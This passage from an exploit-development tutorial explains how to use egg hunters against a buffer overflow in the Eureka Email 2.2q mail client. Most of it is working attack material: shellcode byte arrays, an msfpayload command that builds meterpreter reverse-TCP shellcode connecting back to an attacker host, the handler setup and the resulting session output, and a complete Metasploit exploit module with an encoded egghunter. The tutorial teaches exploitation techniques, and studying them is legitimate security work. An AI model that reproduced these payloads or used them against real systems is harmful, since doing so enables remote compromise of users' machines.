Continue to run the application, and calc.exe should pop up<\/p>\n
\"image\"<\/a><\/p>\n
Nice.<\/p>\n
As a little exercise, let\u2019s try to figure out where exactly the shellcode was located in memory when it got executed.<\/p>\n
Put a break between the 2 eggs and the shellcode (so prepend the shellcode with 0xCC), and run the exploit again (attached to the debugger)<\/p>\n
\"image\"<\/a><\/p>\n
The egg+shellcode was found in the resources section of the application.<\/p>\n
\"image\"<\/a><\/p>\n
So it looks like the egghunter (at 0x0012cd6c) had to search memory until it reached 0x004739AD.<\/p>\n
If we look back (put breakpoint at jmp esp) and look at stack,we see this :<\/p>\n
\"image\"<\/a><\/p>\n
Despite the fact that the shellcode was not located anywhere near the hunter, It did not take a very long time before the egg hunter could locate the eggs and execute the shellcode.\u00a0 Cool !<\/p>\n
But what if the shellcode is on the heap ? How can we find all instances of the shellcode in memory? What if it takes a long time before the shellcode is found ? What if we must tweak the hunter so it would start searching in a particular place in memory ? And is there a way to change the place where the egg hunter will start the search ?\u00a0 A lot of questions, so let\u2019s continue.<\/p>\n
 <\/p>\n
 <\/p>\n
Tweaking the egg hunter start position (for fun, speed and reliability)<\/h3>\n
When the egg hunter in our example starts executing, it will perform the following instructions :<\/p>\n
(Let\u2019s pretend that EDX points to 0x0012E468 at this point, and the egg sits at 0x0012f555 or so. )<\/em><\/p>\n
0012F460 66:81CA FF0F OR DX,0FFF 0012F465 42 INC EDX<\/span><\/strong>\n0012F466   52               PUSH<\/span> EDX\n0012F467   6A 02            PUSH<\/span> 2\n0012F469   58               POP<\/span> EAX<\/pre>\n
The first instruction will put 0x0012FFFF into EDX. The next instruction (INC EDX) increments EDX with 1, so EDX now points at 0x00130000. This is the end of the current stack frame, so the search does not even start in a location where it would potentially find a copy of the shellcode in the same stack frame. (Ok, there is no copy of the shellcode in that location in our example, but it could have been the case).\u00a0 The egg+shellcode are somewhere in memory, and the egg hunter will eventually find the egg+shellcode. No problems there.<\/p>\n
If the shellcode could only be found on the current stack frame (which would be rare - but hey, can happen), then it may not be possible to find the shellcode using this egg hunter (because the hunter would start searching *after* the shellcode\u2026)\u00a0 Obviously, if you can execute some lines of code, and the shellcode is on the stack as well, it may be easier to jump to the shellcode directly by using a near or far jump using an offset\u2026\u00a0\u00a0 But it may not be reliable to do so.<\/p>\n
Anyways, there could be a case where you would need to tweak the egg hunter a bit so it starts looking in the right place (by positioning itself before the eggs and as close as possible to the eggs, and then execute the search loop).<\/p>\n
Do some debugging and you\u2019ll see. (watch the EDI register when the egghunter runs and you\u2019ll see where it starts).\u00a0 If modifying the egg hunter is required, then it may be worth while playing with the first instruction of the egg hunter a little.\u00a0 Replacing FF0F with 00 00 will allow you to search the current stack frame if that is required\u2026\u00a0 Of course, this one would contain null bytes and you would have to deal with that.\u00a0\u00a0 If that is a problem,\u00a0 you may need to be a little creative.<\/p>\n
There may be other ways to position yourself closer, by replacing 0x66,0x81,0xca,0xff,0x0f with some instructions that would (depending on your requirements). Some examples :<\/p>\n
- find the beginning of the current stack frame and put that value in EDI<\/p>\n
- move the contents of another register into EDI<\/p>\n
- find the image base address and put it in EDI<\/p>\n
- put a custom value in EDI (dangerous - that would be like hardcoding an address, so make sure whatever you put in EDI is located BEFORE the eggs+shellcode).\u00a0\u00a0 You could look at the other registers at the moment the egghunter code would run and see if one of the registers could be placed in EDI to make the hunter start closer to the egg. Alternatively see what is in ESP (perhaps a couple of pop edi instructions may put something usefull in EDI)<\/p>\n
- etc<\/p>\n
Of course, tweaking the start location is only advised if<\/p>\n
- speed really is an issue<\/p>\n
- the exploit does not work otherwise<\/p>\n
- you can perform the change in a generic way or if this is a custom exploit that needs to work only once.<\/p>\n
Anyways, I just wanted to mention that you should be a little creative in order to make a better exploit, a faster exploit, a smaller exploit, etc.<\/p>\n
 <\/p>\n
Hey, the egg hunter works fine in most cases ! Why would I ever need to change the start address ?<\/h4>\n
Ok - good question<\/p>\n
There may be a case where the final shellcode (tag+shellcode) is located in multiple places in memory, and some of these copies are corrupted\/truncated\/\u2026\u00a0 ( = They set us up the bomb <\/em>) In this particular scenario, there may be good reason to reposition the egg hunter seach start location so it would try to avoid corrupted copies. (After all, the egg hunter only looks at the 8 byte tag and not at the rest of the shellcode behind it)<\/p>\n
A good way of finding out if your shellcode<\/p>\n
- is somewhere in memory (and where it is)<\/p>\n
- is corrupt or not<\/p>\n
is by using the \u201c!pvefindaddr compare\u201d functionality, which was added in version 1.16 of the plugin.<\/p>\n
This feature was really added to compare shellcode in memory with shellcode in a file, but it will dynamically search for all instances of the shellcode. So you can see where your shellcode is found, and whether the code in a given location was modified\/cut off in memory or not.\u00a0\u00a0 Using that information, you can make a decision whether you should tweak the egg hunter start position or not, and if you have to change it, where you need to change it into.<\/p>\n
A little demo on how to compare shellcode\u00a0 :<\/p>\n
First, you need to write your shellcode to a file.\u00a0 You can use a little script like this to write the shellcode to a file :<\/p>\n
# write<\/span> shellcode for calc.exe to file called code.bin\n# you can - of course - prepend this with egghunter tag\n# if<\/span> you want\n#\nmy<\/span> $shellcode=\"\\x89\\xe2\\xda\\xc1\\xd9\\x72\\xf4\\x58\\x50\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"\\x43\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56<\/span>\" .\n\"\\x58\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41<\/span>\" .\n\"\\x42\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42<\/span>\" .\n\"\\x30\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x4a<\/span>\" .\n\"\\x48\\x50\\x44\\x43\\x30\\x43\\x30\\x45\\x50\\x4c\\x4b\\x47\\x35\\x47<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x43\\x48\\x45\\x51\\x4a\\x4f\\x4c<\/span>\" .\n\"\\x4b\\x50\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a<\/span>\" .\n\"\\x4b\\x51\\x59\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x50<\/span>\" .\n\"\\x31\\x49\\x50\\x4c\\x59\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x43\\x44\\x43<\/span>\" .\n\"\\x37\\x49\\x51\\x49\\x5a\\x44\\x4d\\x43\\x31\\x49\\x52\\x4a\\x4b\\x4a<\/span>\" .\n\"\\x54\\x47\\x4b\\x51\\x44\\x46\\x44\\x43\\x34\\x42\\x55\\x4b\\x55\\x4c<\/span>\" .\n\"\\x4b\\x51\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44<\/span>\" .\n\"\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x45\\x51\\x4a\\x4b\\x4c<\/span>\" .\n\"\\x4b\\x45\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x47<\/span>\" .\n\"\\x54\\x43\\x34\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x43\\x50\\x50<\/span>\" .\n\"\\x56\\x45\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44<\/span>\" .\n\"\\x4c\\x4c\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x43<\/span>\" .\n\"\\x38\\x4b\\x39\\x4a\\x58\\x4c\\x43\\x49\\x50\\x42\\x4a\\x50\\x50\\x42<\/span>\" .\n\"\\x48\\x4c\\x30\\x4d\\x5a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4a\\x38\\x4b<\/span>\" .\n\"\\x4e\\x4d\\x5a\\x44\\x4e\\x46\\x37\\x4b\\x4f\\x4d\\x37\\x42\\x43\\x45<\/span>\" .\n\"\\x31\\x42\\x4c\\x42\\x43\\x45\\x50\\x41\\x41<\/span>\";\n\nopen<\/span>(FILE,\">code.bin<\/span>\");\nprint<\/span> FILE $shellcode;\nprint<\/span> \"Wrote <\/span>\".length<\/span>($shellcode).\" bytes to file code.bin\\n<\/span>\";\nclose<\/span>(FILE);<\/pre>\n
(We\u2019ll assume you have written the file into c:\\tmp\". Note that in this example, I did not prepend the shellcode with w00tw00t, because this technique really is not limited to egg hunters. Of course, if you want to prepend it with w00tw00t - be my guest)<\/p>\n
Next, attach Immunity Debugger to the application, put a breakpoint before the shellcode would get executed, and then trigger the exploit.<\/p>\n
Now run the following PyCommand :\u00a0 !pvefindaddr compare c:\\tmp\\code.bin<\/p>\n
The script will open the file, take the first 8 bytes, and search memory for each location that points to these 8 bytes. Then, at each location, it will compare the shellcode in memory with the original code in the file.<\/p>\n
If the shellcode is unmodified, you\u2019ll see something like this :<\/p>\n
If the shellcode is different (I have replaced some bytes with something else, just for testing purposes), you\u2019ll get something like this :<\/p>\n
- for each unmatched byte, you\u2019ll get an entry in the log, indicating the position in the shellcode, the original value (= what is found in the file at that position), and the value found in memory (so you can use this to build a list of bad chars, or to determine that - for example - shellcode was converted to uppercase or lowercase\u2026. )<\/p>\n
- a visual representation will be given, indicating \u201c--\u201c when bytes don\u2019t match :<\/p>\n
\"image\"<\/a><\/p>\n
So if one of the instances in memory seems to be corrupted, you can try to re-encode the shellcode to filter out bad chars\u2026 but if there is one instance that is not broken, you can try to figure out a way to get the egg hunter to start at a location that would trigger the hunter to find the unmodified version of the shellcode first \ud83d\ude42<\/p>\n
Note : you can compare bytes in memory (at a specific location) with bytes from a file by adding the memory address to the command line :<\/p>\n
\"image\"<\/a><\/p><\/blockquote>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
See if the egg hunter still works with larger shellcode (which is one of the goals behind using egg hunters)<\/h3>\n
Let\u2019s try again with larger shellcode.\u00a0 We\u2019ll try to spawn a meterpreter session over tcp (reverse connect to attacker) in the same Eureka Email exploit.<\/p>\n
Generate the shellcode. My attacker machine is at 192.168.0.122. The default port is 4444. We\u2019ll use alpha_mixed as encoder,\u00a0 so the command would be :<\/p>\n
.\/msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.0.122 R | .\/msfencode -b '0x00' -t perl -e x86\/alpha_mixed<\/p>\n
.\/msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.0.122 R | .\/msfencode -b '0x00' -t perl -e x86\/alpha_mixed\n[*] x86\/alpha_mixed succeeded with size 644 (iteration=1)\n\nmy<\/span> $buf =\n\"\\x89\\xe5\\xd9\\xe5\\xd9\\x75\\xf4\\x5e\\x56\\x59\\x49\\x49\\x49\\x49<\/span>\" .\n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51<\/span>\" .\n\"\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32<\/span>\" .\n\"\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41<\/span>\" .\n\"\\x42\\x75\\x4a\\x49\\x49\\x6c\\x4b\\x58\\x4e\\x69\\x45\\x50\\x45\\x50<\/span>\" .\n\"\\x45\\x50\\x43\\x50\\x4c\\x49\\x4b\\x55\\x46\\x51\\x49\\x42\\x50\\x64<\/span>\" .\n\"\\x4e\\x6b\\x42\\x72\\x44\\x70\\x4c\\x4b\\x46\\x32\\x46\\x6c\\x4e\\x6b<\/span>\" .\n\"\\x43\\x62\\x45\\x44\\x4e\\x6b\\x44\\x32\\x51\\x38\\x46\\x6f\\x4c\\x77<\/span>\" .\n\"\\x50\\x4a\\x45\\x76\\x45\\x61\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4e\\x4c<\/span>\" .\n\"\\x47\\x4c\\x43\\x51\\x43\\x4c\\x46\\x62\\x44\\x6c\\x51\\x30\\x4f\\x31<\/span>\" .\n\"\\x4a\\x6f\\x44\\x4d\\x43\\x31\\x4f\\x37\\x4d\\x32\\x4c\\x30\\x50\\x52<\/span>\" .\n\"\\x42\\x77\\x4e\\x6b\\x50\\x52\\x44\\x50\\x4e\\x6b\\x50\\x42\\x47\\x4c<\/span>\" .\n\"\\x43\\x31\\x4a\\x70\\x4e\\x6b\\x43\\x70\\x43\\x48\\x4b\\x35\\x49\\x50<\/span>\" .\n\"\\x43\\x44\\x43\\x7a\\x45\\x51\\x48\\x50\\x46\\x30\\x4e\\x6b\\x43\\x78<\/span>\" .\n\"\\x45\\x48\\x4c\\x4b\\x50\\x58\\x45\\x70\\x47\\x71\\x49\\x43\\x4a\\x43<\/span>\" .\n\"\\x47\\x4c\\x42\\x69\\x4c\\x4b\\x44\\x74\\x4e\\x6b\\x47\\x71\\x49\\x46<\/span>\" .\n\"\\x50\\x31\\x49\\x6f\\x50\\x31\\x4b\\x70\\x4e\\x4c\\x4b\\x71\\x4a\\x6f<\/span>\" .\n\"\\x44\\x4d\\x47\\x71\\x4b\\x77\\x45\\x68\\x4b\\x50\\x43\\x45\\x4a\\x54<\/span>\" .\n\"\\x47\\x73\\x43\\x4d\\x49\\x68\\x45\\x6b\\x43\\x4d\\x51\\x34\\x44\\x35<\/span>\" .\n\"\\x4d\\x32\\x51\\x48\\x4c\\x4b\\x42\\x78\\x51\\x34\\x47\\x71\\x4b\\x63<\/span>\" .\n\"\\x43\\x56\\x4e\\x6b\\x46\\x6c\\x50\\x4b\\x4c\\x4b\\x43\\x68\\x47\\x6c<\/span>\" .\n\"\\x45\\x51\\x4e\\x33\\x4e\\x6b\\x45\\x54\\x4e\\x6b\\x46\\x61\\x4a\\x70<\/span>\" .\n\"\\x4c\\x49\\x50\\x44\\x51\\x34\\x45\\x74\\x51\\x4b\\x43\\x6b\\x51\\x71<\/span>\" .\n\"\\x51\\x49\\x50\\x5a\\x42\\x71\\x49\\x6f\\x4d\\x30\\x51\\x48\\x43\\x6f<\/span>\" .\n\"\\x51\\x4a\\x4c\\x4b\\x44\\x52\\x4a\\x4b\\x4d\\x56\\x51\\x4d\\x51\\x78<\/span>\" .\n\"\\x46\\x53\\x46\\x52\\x45\\x50\\x47\\x70\\x50\\x68\\x42\\x57\\x50\\x73<\/span>\" .\n\"\\x50\\x32\\x51\\x4f\\x50\\x54\\x51\\x78\\x42\\x6c\\x44\\x37\\x46\\x46<\/span>\" .\n\"\\x43\\x37\\x49\\x6f\\x4e\\x35\\x4c\\x78\\x4c\\x50\\x46\\x61\\x43\\x30<\/span>\" .\n\"\\x45\\x50\\x46\\x49\\x4a\\x64\\x51\\x44\\x50\\x50\\x43\\x58\\x44\\x69<\/span>\" .\n\"\\x4f\\x70\\x42\\x4b\\x45\\x50\\x4b\\x4f\\x48\\x55\\x50\\x50\\x46\\x30<\/span>\" .\n\"\\x42\\x70\\x50\\x50\\x47\\x30\\x50\\x50\\x43\\x70\\x46\\x30\\x45\\x38<\/span>\" .\n\"\\x48\\x6a\\x46\\x6f\\x49\\x4f\\x49\\x70\\x4b\\x4f\\x4e\\x35\\x4f\\x67<\/span>\" .\n\"\\x42\\x4a\\x47\\x75\\x51\\x78\\x4f\\x30\\x4f\\x58\\x43\\x30\\x42\\x5a<\/span>\" .\n\"\\x50\\x68\\x46\\x62\\x43\\x30\\x42\\x31\\x43\\x6c\\x4c\\x49\\x4d\\x36<\/span>\" .\n\"\\x50\\x6a\\x42\\x30\\x46\\x36\\x46\\x37\\x42\\x48\\x4d\\x49\\x4e\\x45<\/span>\" .\n\"\\x42\\x54\\x51\\x71\\x49\\x6f\\x4e\\x35\\x4d\\x55\\x49\\x50\\x44\\x34<\/span>\" .\n\"\\x44\\x4c\\x49\\x6f\\x50\\x4e\\x44\\x48\\x50\\x75\\x4a\\x4c\\x43\\x58<\/span>\" .\n\"\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x49\\x6f\\x4a\\x75\\x43\\x5a<\/span>\" .\n\"\\x45\\x50\\x51\\x7a\\x43\\x34\\x42\\x76\\x50\\x57\\x51\\x78\\x45\\x52<\/span>\" .\n\"\\x4b\\x69\\x4b\\x78\\x43\\x6f\\x49\\x6f\\x48\\x55\\x4e\\x6b\\x46\\x56<\/span>\" .\n\"\\x51\\x7a\\x51\\x50\\x43\\x58\\x45\\x50\\x46\\x70\\x45\\x50\\x45\\x50<\/span>\" .\n\"\\x51\\x46\\x42\\x4a\\x45\\x50\\x50\\x68\\x51\\x48\\x4f\\x54\\x46\\x33<\/span>\" .\n\"\\x4d\\x35\\x4b\\x4f\\x4b\\x65\\x4e\\x73\\x46\\x33\\x42\\x4a\\x43\\x30<\/span>\" .\n\"\\x50\\x56\\x43\\x63\\x50\\x57\\x42\\x48\\x44\\x42\\x48\\x59\\x49\\x58<\/span>\" .\n\"\\x51\\x4f\\x49\\x6f\\x4b\\x65\\x43\\x31\\x49\\x53\\x46\\x49\\x4b\\x76<\/span>\" .\n\"\\x4d\\x55\\x4b\\x46\\x51\\x65\\x48\\x6c\\x49\\x53\\x47\\x7a\\x41\\x41<\/span>\";<\/pre>\n
In the exploit script, replace the calc.exe shellcode with the one generated above.<\/p>\n
Before running the exploit, set up the meterpreter listener :<\/p>\n
.\/msfconsole<\/span><\/strong> \n\n ____________\n< metasploit >\n ------------\n       \\   ,__,\n        \\  (oo)____\n           (__)    )\\\n              ||--|| *\n\n       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]\n+ -- --=[ 490 exploits - 227 auxiliary\n+ -- --=[ 192 payloads - 23 encoders - 8 nops\n       =[ svn r8091 updated today (2010.01.09)\n\nmsf > use<\/span> exploit\/multi\/handler<\/span><\/strong>\nmsf exploit(handler) > set PAYLOAD windows\/meterpreter\/reverse_tcp<\/span><\/strong>\nPAYLOAD => windows\/meterpreter\/reverse_tcp\nmsf exploit(handler) > set LPORT 4444<\/span><\/strong>\nLPORT => 4444\nmsf exploit(handler) > set LHOST 192.168.0.122<\/span><\/strong>\nLHOST => 192.168.0.122\nmsf exploit(handler) > show options<\/span><\/strong>           \n\nModule<\/span> options:\n\n   Name  Current Setting  Required  Description\n   ----  ---------------  --------  -----------\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  process          yes       Exit technique: seh, thread, process\n   LHOST     192.168.0.122    yes       The local<\/span> address\n   LPORT     4444             yes       The local<\/span> port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Wildcard Target\n\nmsf exploit(handler) > exploit<\/span><\/strong>\n\n[*] Starting the payload handler...\n[*] Started reverse<\/span> handler on port 4444<\/pre>\n
Now run the exploit and trigger the overflow with Eureka. After a few seconds, you should see this :<\/p>\n
[*] Sending stage (723456 bytes)\n[*] Meterpreter session 1 opened (192.168.0.122:4444 -> 192.168.0.193:15577)\n\nmeterpreter ><\/pre>\n
owned !<\/p>\n
 <\/p>\n
 <\/p>\n
Implementing egg hunters in Metasploit<\/h3>\n
Let\u2019s convert our Eureka Mail Client egghunter exploit to a metasploit module.\u00a0 You can find some information on how exploit modules can be ported on the Metasploit wiki : http:\/\/www.metasploit.com\/redmine\/projects\/framework\/wiki\/PortingExploits<\/a><\/p>\n
Some facts before we begin :<\/p>\n
- we will need to set up a server (POP3, listener on port 110)<\/p>\n
- we will need to calculate the correct offset. We\u2019ll use the SRVHOST parameter for this<\/p>\n
- we\u2019ll assume that the client is using XP SP3 (you can add more if you can get hold of the correct trampoline addresses for other Service Packs)<\/p>\n
Note : the original metasploit module for this vulnerability is already part of Metasploit (see the exploits\/windows\/misc folder, and look for eureka_mail_err.rb). We\u2019ll just make our own module.<\/p>\n
Our custom metasploit module could look something like this :<\/p>\n
class<\/span> Metasploit3 < Msf::Exploit::Remote\n   Rank = NormalRanking\n   include Msf::Exploit::Remote::TcpServer\n   include Msf::Exploit::Egghunter\n   def<\/span> initialize(info = {})\n      super<\/span>(update_info(info,\n       'Name'           => 'Eureka Email 2.2q ERR Remote Buffer Overflow Exploit',\n       'Description'    => %q{\n           This module<\/span> exploits a buffer overflow in<\/span> the Eureka Email 2.2q\n           client that is triggered through an excessively long ERR message.\n           },\n       'Author'         =>\n           [\n             'Peter Van Eeckhoutte (a.k.a corelanc0d3r)'\n           ],\n        'DefaultOptions' =>\n            {\n             'EXITFUNC' => 'process',\n            },\n        'Payload'        =>\n            {\n             'BadChars' => \"\\x00\\x0a\\x0d\\x20<\/span>\",\n             'StackAdjustment' => -3500,\n             'DisableNops' => true<\/span>,\n            },\n         'Platform'       => 'win',\n         'Targets'        =>\n            [\n             [ 'Win XP SP3 English', { 'Ret' => 0x7E47BCAF } ], # jmp esp \/ user32.dll<\/span>\n             ],\n         'Privileged'     => false<\/span>,\n         'DefaultTarget'  => 0))\n\n          register_options(\n          [\n           OptPort.new('SRVPORT', [ true<\/span>, \"The POP3 daemon port to listen on<\/span>\", 110 ]),\n          ], self<\/span>.class<\/span>)\n        end<\/span>\n\n        def<\/span> on_client_connect(client)\n           return<\/span> if<\/span> ((p<\/span> = regenerate_payload(client)) == nil<\/span>)\n\n           # the offset to eip depends on the local ip address string length...<\/span>\n           offsettoeip=723-datastore['SRVHOST'].length\n           # create the egg hunter<\/span>\n           hunter = generate_egghunter\n           # egg<\/span>\n           egg = hunter[1]\n           buffer =  \"-ERR <\/span>\"\n           buffer << make_nops(offsettoeip)\n           buffer << [target.ret].pack('V')\n           buffer << hunter[0]\n           buffer << make_nops(1000)\n           buffer << egg + egg\n           buffer << payload.encoded + \"\\r\\n<\/span>\"\n\n           print_status(\" [*] Sending exploit to #{client.peerhost}...<\/span>\")\n           print_status(\" Offset to EIP : #{offsettoeip}<\/span>\")\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n           client.put(buffer)\n\n           handler\n           service.close_client(client)\n        end<\/span>\n\nend<\/span><\/pre>\n
Of course, if you want to use your own custom egg hunter (instead of using the one built into Metasploit - which uses the NtDisplayString\/NtAccessCheckAndAuditAlarm technique to search memory by the way), then you can also write the entire byte code manually in the exploit.<\/p>\n
Exploit : (192.168.0.193 = client running Eureka, configured to connect to 192.168.0.122 as POP3 server.\u00a0\u00a0\u00a0 192.168.0.122 = metasploit machine)<\/p>\n
I have placed the metasploit module under exploit\/windows\/eureka (new folder)<\/p>\n
Test :<\/p>\n
# # ###### ##### ## #### ##### # #### # ##### <\/span>\n## ## # # # # # # # # # # # # <\/span>\n# ## # ##### # # # #### # # # # # # # <\/span>\n# # # # ###### # ##### # # # # # <\/span>\n# # # # # # # # # # # # # # <\/span>\n# # ###### # # # #### # ###### #### # # <\/span>\n       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]\n+ -- --=[ 493 exploits - 232 auxiliary\n+ -- --=[ 192 payloads - 23 encoders - 8 nops\n       =[ svn r8137 updated today (2010.01.15)\nmsf > use exploit\/windows\/eureka\/corelan_eureka2<\/span><\/strong>\nmsf exploit(corelan_eureka2) > set payload windows\/exec<\/span><\/span><\/strong>\npayload => windows\/exec<\/span><\/span><\/strong>\nmsf exploit(corelan_eureka2) > set SRVHOST 192.168.0.122<\/span><\/strong>\nSRVHOST => 192.168.0.122\nmsf exploit(corelan_eureka2) > set CMD calc<\/span><\/strong>\nCMD => calc\nmsf exploit(corelan_eureka2) > exploit<\/span><\/strong>\n[*] Exploit running as background job.\nmsf exploit(corelan_eureka2) >\n[*] Server started.\n[*]  [*] Sending exploit to 192.168.0.193...\n[*]      Offset to EIP : 710\n[*] Server stopped.<\/pre>\n
Connect the Eureka Mail client to 192.168.0.122 :<\/p>\n
\"image\"<\/a><\/p>\n
Other payloads :<\/p>\n
bindshell on port 55555 :<\/p>\n
\"image\"<\/a><\/p>\n
 <\/p>\n
 <\/p>\n
 <\/p>\n
Badchars + Encoding<\/h3>\n
Using Metasploit<\/h4>\n
Egghunter code is just like regular shellcode. It is susceptible to corruption in memory, it may be subject to bad chars, etc.\u00a0 So if you are getting weird errors during egghunter execution, it may be a good idea to compare the original code with what you have in memory and search for bad chars. (I have explained a technique to compare code (whether it\u2019s the egg hunter itself or shellcode - same technique applies) earlier in this document).<\/p>\n
What if you have discovered that the code was corrupted ?<\/p>\n
Alternative encoding may be required to make the egg hunter work, and\/or a \u201cbad char\u201d filter may be required to filter out characters that get corrupted or converted in memory and would break the code.<\/p>\n
Also, keep in mind that the type of encoding & badchars to filter *may* be entirely different between what is applicable to the final shellcode and what is applicable to the egg hunter. It won\u2019t happen a lot of times, but it is possible. So you may want to run the exercise on both the hunter and the shellcode.<\/p>\n
Encoding the egg hunter (or any shellcode) is quite simple.\u00a0 Just write the egghunter to a file, encode the file, and use the encoded byte code output as your egg hunter payload.\u00a0 Whether you\u2019ll have to include the tag before encoding or not depends on the bad chars, but in most cases you should not include it.\u00a0 After all, if the tag is different after encoding, you also need to prepend the shellcode with the modified tag\u2026\u00a0 You\u2019ll have to put the egg hunter in a debugger and see what happened to the tag.<\/p>\n
Example : Let\u2019s say the egg hunter needs to be alphanumerical (uppercase) encoded, and you have included the tag in the eggfile, then this will be the result :<\/p>\n
root@xxxxx:\/pentest\/exploits\/trunk# cat writeegghunter.pl <\/span>\n#!\/usr\/bin\/perl<\/span>\n# Write egghunter to file<\/span>\n# Peter Van Eeckhoutte<\/span>\n#<\/span>\nmy $eggfile = \"eggfile.bin<\/span>\";\nmy $egghunter = \"\\x66\\x81\\xCA\\xFF\\x0F\\x42\\x52\\x6A\\x02\\x58\\xCD\\x2E\\x3C\\x05\\x5A\\x74\\xEF\\xB8<\/span>\".\n\"\\x77\\x30\\x30\\x74<\/span>\". # this is the marker\/tag: w00t<\/span>\n\"\\x8B\\xFA\\xAF\\x75\\xEA\\xAF\\x75\\xE7\\xFF\\xE7<\/span>\";\n\nopen<\/span>(FILE,\">$eggfile<\/span>\");\nprint<\/span> FILE $egghunter;\nclose(FILE);\nprint<\/span> \"Wrote <\/span>\".length($egghunter).\" bytes to file <\/span>\".$eggfile.\"\\n<\/span>\";\n\nroot@xxxxx:\/pentest\/exploits\/trunk# perl writeegghunter.pl <\/span>\nWrote 32 bytes to file eggfile.bin\n\nroot@xxxxx:\/pentest\/exploits\/trunk# .\/msfencode -e x86\/alpha_upper -i eggfile.bin -t perl<\/span>\n[*] x86\/alpha_upper succeeded with size 132 (iteration=1)\n\nmy $buf =\n\"\\x89\\xe0\\xda\\xc0\\xd9\\x70\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43<\/span>\" .\n\"\\x43\\x43\\x43\\x43\\x43\\x52\\x59\\x56\\x54\\x58\\x33\\x30\\x56\\x58<\/span>\" .\n\"\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>\" .\n\"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30<\/span>\" .\n\"\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x43\\x56\\x4d\\x51<\/span>\" .\n\"\\x49\\x5a\\x4b\\x4f\\x44\\x4f\\x51\\x52\\x46\\x32\\x43\\x5a\\x44\\x42<\/span>\" .\n\"\\x50\\x58\\x48\\x4d\\x46\\x4e\\x47\\x4c\\x43\\x35\\x51\\x4a\\x42\\x54<\/span>\" .\n\"\\x4a\\x4f\\x4e\\x58\\x42\\x57\\x46\\x50\\x46\\x50\\x44\\x34\\x4c\\x4b<\/span>\" .\n\"\\x4b\\x4a\\x4e\\x4f\\x44\\x35\\x4b\\x5a\\x4e\\x4f\\x43\\x45\\x4b\\x57<\/span>\" .\n\"\\x4b\\x4f\\x4d\\x37\\x41\\x41<\/span>\";<\/pre>\n
Look at the output in $buf : your tag must be out there, but where is it ? has it been changed or not ? will this encoded version work ?<\/p>\n
Try it. Don\u2019t be disappointed if it doesn\u2019t, and read on.<\/p>\n
 <\/p>\n
 <\/p>\n
Hand-crafting the encoder<\/h4>\n
What if there are too many constraints and, Metasploit fails to encode your shellcode ?\u00a0 (egg hunter = shellcode, so this applies to all shapes and forms of shellcode in general)<\/p>\n
What if, for example, the list of bad chars is quite extensive, what if - on top of that - the egg hunter code should be alphanumeric only\u2026<\/p>\n
Well, you\u2019ll have to handcraft the encoder yourself.\u00a0 In fact, just encoding the egg hunter (including the tag) will not work out of the box. What we really need is a decoder that will reproduce the original egg hunter (including the tag) and then execute it.<\/p>\n
The idea behind this chapter was taken from a beautiful exploit<\/a> written by muts. If you look at this exploit, you can see a somewhat \u201cspecial\u201d egghunter.<\/p>\n
egghunter=(\n\"%JMNU%521*TX-1MUU-1KUU-5QUUP\\AA%J<\/span>\"\n\"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5<\/span>\"\n\"21*-q!au-q!au-oGSePAA%JMNU%521*-D<\/span>\"\n\"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1<\/span>\"\n\"z1E-oRHEPAA%JMNU%521*-3s1--331--^<\/span>\"\n\"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA<\/span>\"\n\"A%JMNU%521*-R222-1111-nZJ2PAA%JMN<\/span>\"\n\"U%521*-1-wD-1-wD-8$GwP<\/span>\")<\/pre>\n
The exploit code also states : \u201cAlphanumeric egghunter shellcode + restricted chars \\x40\\x3f\\x3a\\x2f\u201d. So it looks like the exploit only can be triggered using printable ascii characters (alphanumeric) (which is not so uncommon for a web server\/web application)<\/p>\n
When you convert this egghunter to asm, you see this : (just the first few lines are shown)<\/p>\n
